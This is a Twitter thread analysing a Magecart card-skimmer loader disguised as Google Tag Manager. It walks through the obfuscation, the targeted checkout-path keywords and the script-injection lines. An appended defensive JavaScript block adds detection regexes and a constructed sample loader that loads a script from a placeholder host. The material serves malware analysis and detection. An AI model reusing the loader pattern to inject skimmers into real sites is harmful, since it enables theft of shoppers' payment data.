Thread by Affable Kraut, 10 tweets
A week or so ago I broke down one #magecart loader, which was pretending to be Google Analytics -

Today, let's look at another version of this they use which purports to be Google Tag Manager. Most of this will look pretty similar to the GA version.
So here's the code we'll be looking at as you would see it on an infected website: gist.github.com/krautface/e0f8…
and then here's the same thing prettified:
gist.github.com/krautface/e8f0…
Lines 3-14 in the prettified version look like they're doing something. If you look at line 47 you can see the arguments passed into this anonymous function: window, document, 'script', 'dataLayer', 'GTM-WYRDH'. Lines 10-14 actually create a legit script tag; it's just never used.
Lines 15-18, there's a bunch of meaningless variable names, like in the other version: keyProc, innerMeta, optEmbed, and a function called pickFooter, which is actually what is used to turn the values in innerMeta into short snippets of text to match against the current URL path.
Lines 31-38 are setting up some variables that will be used to construct the actual script tag. They call the deobfuscation function pickFooter with an argument of 'pxwe8al23pjj', which is just used to XOR the values. The results:
Finally, lines 39-46 are looping through the values in innerMeta to see if the current URL path contains them. The values it's looking for: onestepcheckout, checkout, onepage, onestep, firecheckout, securecheckout, idecheckoutvm, oscheckout, pagamento, odeme, fechar-compra
On line 40, it's checking to see if the string position of any of those in the URL is not equal to optEmbed. optEmbed is set to -1, so this is just a standard way of checking if a string exists in another string. If it does, that call will return 0 or more.
Line 42 cleaned up: keyProc = document['createElement']('script')
Line 43 cleaned up: keyProc['setAttribute']('src', 'sorry-had-to-remove-this')
Line 44 cleaned up: head['appendChild'](keyProc)

(apologies for the censoring, but this isn't my intel to share freely)
Lastly, here's a version of the loader with all the extraneous stuff removed. The debugger on line 44 stops the execution, and you can see the keyProc variable is a script tag (with an empty src) by running console.log(keyProc): gist.github.com/krautface/93ff…
To clarify one thing: this is a loader used by the same skimming group as the Google Analytics one, but there are numerous other ones. If you see some JS with similar characteristics (especially the long array of obfuscated strings and the for loop) it's likely the same group.
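As an added defender-side example (not the author's code or the loader itself), the snippet below does two things with what the thread describes: it reproduces the loader's trigger check (indexOf against the URL path, compared to -1) using the decoded keyword list, so you can tell which of your pages this family would fire on, and it scores a script's source text for the characteristics called out above (decoy GTM bootstrap, long array of obfuscated strings, path-keyword loop, dynamic script injection). The regexes and both sample scripts are constructed assumptions; the XOR key and the real pickFooter routine are not reproduced.

```javascript
// Keyword list decoded in the thread (the values the loader looks for in the path).
const CHECKOUT_KEYWORDS = [
  'onestepcheckout', 'checkout', 'onepage', 'onestep', 'firecheckout',
  'securecheckout', 'idecheckoutvm', 'oscheckout', 'pagamento', 'odeme',
  'fechar-compra',
];

// Mirrors the loop on lines 39-46: fire if path.indexOf(value) !== optEmbed (-1).
function isTargetedPath(path) {
  const optEmbed = -1;
  return CHECKOUT_KEYWORDS.some((kw) => path.indexOf(kw) !== optEmbed);
}

// Heuristic indicators for a script-inventory scan. Each regex is an assumption
// about how the pattern shows up in source text, not a signature from the thread.
const INDICATORS = {
  fakeTagManagerBootstrap: /['"]dataLayer['"]\s*,\s*['"]GTM-[A-Z0-9]+['"]/,
  longObfuscatedStringArray: /\[\s*(?:['"][A-Za-z0-9+/=_-]{6,}['"]\s*,\s*){8,}/,
  pathKeywordLoop: /location\W{0,6}pathname[\s\S]{0,200}indexOf/,
  dynamicScriptInjection: /createElement\W{0,4}\(\s*['"]script['"]\s*\)[\s\S]{0,300}appendChild/,
};

// A genuine GTM snippet hits only the first indicator, so require several to flag.
function scoreLoaderIndicators(source) {
  const hits = Object.entries(INDICATORS)
    .filter(([, re]) => re.test(source))
    .map(([name]) => name);
  return { hits, suspicious: hits.length >= 3 };
}

// Constructed sample shaped like the cleaned-up loader (NOT the real sample).
const SAMPLE_LOADER = `
(function(w,d,s,l,i){})(window,document,'script','dataLayer','GTM-XXXXXXX');
var innerMeta=['aGVsbG8x','d29ybGQy','Zm9vYmFy','YmF6cXV4','bG9yZW1p','aXBzdW1k','ZG9sb3Jz','c2l0YW1l','dGVzdGRh','eHh4eHh4'];
var optEmbed=-1;
for(var i=0;i<innerMeta.length;i++){
  if(window['location']['pathname'].indexOf(pickFooter(innerMeta[i],'key'))!==optEmbed){
    var keyProc=document['createElement']('script');
    keyProc['setAttribute']('src','https://example.invalid/loader.js');
    document['head']['appendChild'](keyProc);
  }
}`;

// Constructed benign Google Tag Manager bootstrap for comparison.
const BENIGN_GTM = `(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXXXXX');`;

console.log(isTargetedPath('/checkout/onepage/'), scoreLoaderIndicators(SAMPLE_LOADER));
```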